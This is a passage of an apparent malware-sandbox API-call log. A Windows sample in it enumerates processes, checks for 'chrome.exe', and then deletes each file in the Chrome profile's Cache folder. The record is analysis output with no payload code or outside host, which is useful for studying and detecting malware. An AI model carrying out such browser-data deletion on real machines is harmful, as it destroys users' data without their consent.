th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x200, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0254.266] lstrcmpiW (lpString1="conhost.exe", lpString2="chrome.exe") returned 1 [0254.267] Process32NextW (in: hSnapshot=0x8e4, lppe=0x44dfa10 | out: lppe=0x44dfa10*(dwSize=0x238, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x200, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0254.268] CloseHandle (hObject=0x8e4) returned 1 [0254.268] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0254.268] PathCombineW (in: pszDest=0x7aae530, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*" [0254.268] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*", lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 0x442fc30 [0254.272] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.272] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.272] lstrlenW (lpString="data_0") returned 6 [0254.273] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="data_0" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" [0254.273] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_0")) returned 1 [0254.274] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.274] lstrlenW (lpString="data_1") returned 6 [0254.274] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="data_1" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" [0254.274] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_1")) returned 1 [0254.274] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.274] lstrlenW (lpString="data_2") returned 6 [0254.274] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="data_2" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" [0254.274] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_2")) returned 1 [0254.275] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.275] lstrlenW (lpString="data_3") returned 6 [0254.275] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="data_3" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" [0254.275] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\data_3")) returned 1 [0254.276] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.276] lstrlenW (lpString="f_000001") returned 8 [0254.276] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000001" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000001") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000001" [0254.276] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000001" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000001")) returned 1 [0254.277] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.277] lstrlenW (lpString="f_000002") returned 8 [0254.277] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000002" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000002") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000002" [0254.277] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000002" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000002")) returned 1 [0254.278] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.278] lstrlenW (lpString="f_000003") returned 8 [0254.278] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000003" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000003") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000003" [0254.278] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000003" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000003")) returned 1 [0254.279] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.279] lstrlenW (lpString="f_000004") returned 8 [0254.279] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000004" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000004") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000004" [0254.279] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000004" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000004")) returned 1 [0254.280] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.280] lstrlenW (lpString="f_000005") returned 8 [0254.280] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000005" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000005") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000005" [0254.280] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000005" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000005")) returned 1 [0254.280] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.280] lstrlenW (lpString="f_000006") returned 8 [0254.280] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000006" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000006") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000006" [0254.281] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000006" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000006")) returned 1 [0254.282] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.282] lstrlenW (lpString="f_000007") returned 8 [0254.282] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000007" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000007") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000007" [0254.282] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000007" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000007")) returned 1 [0254.282] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.282] lstrlenW (lpString="f_000008") returned 8 [0254.282] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000008" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000008") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000008" [0254.282] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000008" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000008")) returned 1 [0254.283] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.283] lstrlenW (lpString="f_000009") returned 8 [0254.283] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000009" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000009") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000009" [0254.283] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000009" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000009")) returned 1 [0254.284] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.284] lstrlenW (lpString="f_00000a") returned 8 [0254.284] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00000a" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000a") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000a" [0254.284] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00000a")) returned 1 [0254.285] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.285] lstrlenW (lpString="f_00000b") returned 8 [0254.285] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00000b" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000b") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000b" [0254.285] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000b" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00000b")) returned 1 [0254.287] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.287] lstrlenW (lpString="f_00000c") returned 8 [0254.287] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00000c" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000c") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000c" [0254.287] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000c" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00000c")) returned 1 [0254.288] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.288] lstrlenW (lpString="f_00000d") returned 8 [0254.288] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00000d" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000d") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000d" [0254.288] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000d" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00000d")) returned 1 [0254.288] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.288] lstrlenW (lpString="f_00000e") returned 8 [0254.289] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00000e" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000e") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000e" [0254.289] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000e" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00000e")) returned 1 [0254.290] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.290] lstrlenW (lpString="f_00000f") returned 8 [0254.290] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00000f" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000f") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000f" [0254.290] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00000f" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00000f")) returned 1 [0254.291] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.291] lstrlenW (lpString="f_000010") returned 8 [0254.291] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000010" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000010") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000010" [0254.291] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000010" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000010")) returned 1 [0254.292] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.292] lstrlenW (lpString="f_000011") returned 8 [0254.292] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000011" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000011") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000011" [0254.292] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000011" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000011")) returned 1 [0254.293] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.293] lstrlenW (lpString="f_000012") returned 8 [0254.293] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000012" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000012") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000012" [0254.293] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000012" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000012")) returned 1 [0254.294] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.294] lstrlenW (lpString="f_000013") returned 8 [0254.294] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000013" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000013") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000013" [0254.294] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000013" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000013")) returned 1 [0254.295] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.295] lstrlenW (lpString="f_000014") returned 8 [0254.295] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000014" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000014") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000014" [0254.296] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000014" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000014")) returned 1 [0254.298] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.298] lstrlenW (lpString="f_000015") returned 8 [0254.298] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000015" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000015") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000015" [0254.298] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000015" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000015")) returned 1 [0254.298] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.298] lstrlenW (lpString="f_000016") returned 8 [0254.298] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000016" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000016") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000016" [0254.298] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000016" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000016")) returned 1 [0254.299] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.300] lstrlenW (lpString="f_000017") returned 8 [0254.300] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000017" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000017") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000017" [0254.300] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000017" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000017")) returned 1 [0254.300] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.300] lstrlenW (lpString="f_000018") returned 8 [0254.300] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_000018" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000018") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000018" [0254.300] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_000018" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_000018")) returned 1 [0254.301] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.301] lstrlenW (lpString="f_00001a") returned 8 [0254.301] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00001a" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001a") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001a" [0254.301] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001a" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\cache\\f_00001a")) returned 1 [0254.302] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0254.302] lstrlenW (lpString="f_00001b") returned 8 [0254.302] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", pszFile="f_00001b" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001b") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\f_00001b" [0254.302] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 